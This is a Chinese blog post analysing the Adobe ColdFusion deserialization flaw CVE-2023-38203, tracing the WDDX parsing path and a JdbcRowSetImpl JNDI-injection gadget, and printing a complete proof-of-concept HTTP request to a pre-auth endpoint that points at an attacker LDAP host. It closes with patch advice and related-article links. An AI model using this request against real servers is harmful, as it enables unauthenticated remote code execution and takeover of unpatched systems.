漏洞分析|Adobe ColdFusion 远程代码执行漏洞(CVE-2023-38203)

最新推荐文章于 2024-01-28 00:00:00 发布
最新推荐文章于 2024-01-28 00:00:00 发布
阅读量724 收藏 2
点赞数 5
文章标签: adobe 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandaoren/article/details/134246511
版权

1.漏洞描述

Adobe ColdFusion是一种服务器端的Web应用开发平台。它由Adobe Systems开发,用于创建动态的、交互式的Web应用程序和网站。

Adobe ColdFusion在2018u17及之前版本、2021u7及之前版本和2023u1及之前版本中存在任意代码执行漏洞。该漏洞是由于反序列化不受信任数据漏洞的影响,可能会导致任意代码执行。攻击者可利用该漏洞对目标有针对性的发起攻击,危害站点系统安全。

2.影响版本

ColdFusion <=2018u17

ColdFusion <=2021u7

ColdFusion <=2023u1

3.影响范围

4.漏洞分析

我们通过git diff看到coldfusion.wddx.DeserializerWorker.java文件

这是一个XML 类型的WDDX数据包解码器。在startElement方法中DeserializerWorker,我们注意到新添加的验证是通过validateWddxFilter() struct参数执行的。

WDDX数据包的解析

<wddxPacket version='1.0'><header/><data><struct type='className'><var name='prop_name'><string>prop_value</string></var></struct></data></wddxPacket>

经过调试后发现Java 反射在某些代码块中被广泛使用,这表明用户输入将经历反射调用。

这是解析过程中有趣部分的代码流程:

 onEndElement() -> getClassBySignature() -> setBeanProperties()

在该方法中,如果 WDDX 数据包的结构元素中提供了 type 属性,则会对该字段onEndElement()执行检查 

 

通过此检查后,将调用getClassbySignature(),它使用反射来获取类实例。类名源自用户控制的输入m_strictType

有了类名后,就可以使用反射来访问类的构造函数,没有参数的构造函数,并实例化类的实例。然后将此实例与用户控制的m_ht字段一起传递给setBeanProperties(),该字段包含WDDX变量。

如果bean有任何setter方法,它将被返回,并最终通过Java Reflections在bean上调用,变量的值是唯一的参数,这些变量的值来自用户控制的WDDX数据包。

在我们通过搜索WddxDeserializer的代码进行分析的过程中,我们发现了一个FilterUtils类的调用。

在GetArgumentCollection方法中使用的。从表单或查询字符串中提取argumentCollection参数。然后检查检索到的输入以确定它是否为JSON类型。如果不是,则使用WDDXDeserialize调用将该值反序列化为WDDX数据包。

在我们的分析中,预授权CFC端点触发对GetArgumentCollection的调用,并最终触发对易受攻击的接收器的调用,即WDDXDeserialize。

/CFDE/adminapi/accessmanager.cfc是预授权有效的cfc端点

我们选择了一个满足指定要求的简单类java.util.Date,我们在请求中创建了一个类似于以下内容的WDDX数据包。

我们能够确认对java.util.Date.setDate(our_input)的调用已成功执行。

我们看看com.sun.rowset.JdbcRowSetImpl类,如果将布尔参数传递给此类的setAutoCommit()方法,它将对dataSourceName执行JNDI查找,该查找可以使用setDataSourceName()方法进行设置。在调用setDataSourceName()之后再调用setAutoCommit()会导致JNDI注入漏洞。需要注意的是,在进行方法调用时,我们处于for循环中,因此我们能够在bean实例上调用多个方法。

我们通过WDDX反序列化升级到JNDI注入。

POC代码: 

POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/2
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 266

argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://attacker:1389/exploit</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>

5.修复建议

目前官方已发布新版已经修复此漏洞,并且为受影响版本发布了补丁,建议用户尽快升级至最新版本。

官方下载地址:

https://helpx.adobe.com/security/products/coldfusion/apsb23-41.html

 

AttackSatelliteLab
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Adobe ColdFusion 反序列化漏洞复现(CVE-2023-38203
0xSec
01-27 719
Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
Adobe ColdFusion 反序列化漏洞复现(CVE-2023-29300)
0xSec
08-02 2449
Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
Adobe ColdFusion中发现的新漏洞
kafankeji的博客
07-19 81
2023年7月11日,Adobe发布了几个影响ColdFusion漏洞补丁,包括rapid7发现的访问控制绕过漏洞(CVE-2023-29298)和允许任意代码执行的不安全反序列化漏洞(CVE-2023-29300)。7月11日针对不安全反序列化漏洞的补丁实现了一个类的拒绝列表,这些类不能被Web分布式数据交换(WDDX)数据反序列化,这些数据构成了对ColdFusion的某些请求的一部分。他们首先发表了他们的发现,然后在7月12日迅速将其撤下。
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1000
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)
EC_Carrot的博客
05-20 554
漏洞背景 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 影响范围 Adobe ColdFusion (2016 release) Update 3及之前的版本 ColdFusion 11 Update 11及之前的版本 ColdFus
漏洞分析Adobe ColdFusion 序列化漏洞CVE-2023-29300)
m0_46699477的博客
08-02 955
通过研究 CVE-2023-29300,我们了解了 Adobe ColdFusion 产品的基本工作原理,其不安全的 WDDX 序列化实现将产生可利用的漏洞。同时,我们详细分析了通过 argumentCollection 参数传入 payload 的完整调用路径,以及为何需要传入看似与利用无关的 method 参数。在此基础上,我们探索了利用的新方向,在这个过程中也踩了不少坑。阅读本篇文章后,大家在复现此漏洞以及在将来需要研究此产品时,就可以少走一些弯路了,后续有机会的话,会进一步分享研究成果。
Adobe ColdFusion
xiwangyizhicunzai的博客
11-08 1671
Adobe ColdFusion 简介: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 默认端口8500 Adobe ColdFusion 文件读取...
漏洞分析|Adobe ColdFusion 反序列化漏洞CVE-2023-29300)
xuandaoren的博客
11-10 1590
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如<string>标签中的元素与属性将由StringHandler处理,<struct>标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
严重的 ColdFusion 缺陷被用于释放 webshell
smellycat000的专栏
07-18 496
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士黑客正在活跃利用两个 ColdFusion 漏洞绕过认证并远程执行命令,在易受攻击的服务器上安装 webshell。Rapid 7 公司的安全研究员表示,威胁行动者正在组合利用访问控制漏洞CVE-2023-29298和严重的RCE漏洞CVE-2023-38203 发动攻击。绕过补丁7月11日,Adobe 披露了由 Rapid 7 研究员 Step...
漏洞分析Adobe ColdFusion WDDX 序列化漏洞利用
m0_46699477的博客
09-07 313
本文将分享继 CVE-2023-29300 之后的不出网利用方式,提出 C3P0 和 JGroups 两条基于服务错误部署的新利用链。现 Goby 中实现了 C3P0 和 JGroups 利用链的完整利用,完全支持命令执行以及结果回显功能。
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,ColdFusion 11, Update 11 和 ColdFusion 10, Update 16...
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
ColdFusion-Realtime-With-WebSockets-Demo-Code:在 Realtime With WebSockets 演示中使用的演示代码
07-24
使用 WebSockets 实时 - 演示代码这是我的 WebSockets 演示中使用的演示代码。 角到冷聚变我在 CFSUMMIT2018 上给出的 Angular 示例。 查看目录中的 README 以了解如何运行。 资产现场演示 UI 共享的 CSS 和 ...
ColdFusion_Study.rar_ColdFusion stu_adobe coldfusion_coldfusion_
07-14
ColdFusion既是WEB服务器,也是一种WEB脚本语言,基于JAVA,非常适合企业网站建设。起源很早,大概1994年,原为一小公司产品,后为MacroMedia收购,现在Adobe。国内应用不多,国外好多企业都用的Coldfusion。如...
cf-tinymce:用于创建tinyMCE实例的ColdFusion函数-支持压缩和每页多个实例
04-29
概要ColdFusion函数用于创建tinyMCE实例-使用CFN并允许每页多个实例。 这是一个不错的基础,具有不错的默认设置。程式码范例要显示一个充满名为“ read”的查询的生物信息的RTE实例,请执行以下操作: <cfoutput>#...
CVE-2021-21087: Adobe ColdFusion远程代码执行漏洞通告
爱国小白帽
03-24 1038
报告编号:B6-2021-032301 报告来源:360CERT 报告作者:360CERT 更新日期:2021-03-23 0x01漏洞简述 2021年03月23日,360CERT监测发现Adobe官方发布了Adobe ColdFusion的风险通告,漏洞编号为CVE-2021-21087,漏洞等级:严重,漏洞评分:9.8。 Adobe ColdFusion是一个商用的快速应用程序开发平台,ColdFusion经常用在数据驱动的网站及内部网的开发上,但也可以用来生成包括SOAP Web服务及Flash远程.
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
利他者利己,利己者无功。利他利己,利己利他。
10-19 3810
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 任意文件读取漏洞复现(CVE-2023-26361)
最新发布
0xSec
01-28 637
Adobe ColdFusion平台 filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
coldfusion 点击下载文件
07-15
要实现通过 ColdFusion 点击下载文件,你可以使用 `<cfheader>` 和 `<cffile>` 标签来完成。以下是一个示例代码: ```coldfusion <cfheader name="Content-Disposition" value="attachment; filename=myfile.pdf"> <cffile action="readbinary" file="path/to/myfile.pdf" variable="fileData"> <cfcontent type="application/pdf" variable="#fileData#"> ``` 在这个示例中,我们首先使用 `<cfheader>` 标签设置文件的下载名字。然后,使用 `<cffile>` 标签将文件读取为二进制数据,并将其存储在 `fileData` 变量中。最后,使用 `<cfcontent>` 标签将文件内容作为响应返回,其中指定了文件的 MIME 类型为 `application/pdf`。 需要注意的是,你需要将 `path/to/myfile.pdf` 替换为实际的文件路径,确保文件存在并且 ColdFusion 有读取权限。另外,你还可以根据需要设置其他的响应头信息,例如设置文件大小、缓存控制等。 希望这个示例对你有帮助!如果你有任何进一步的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值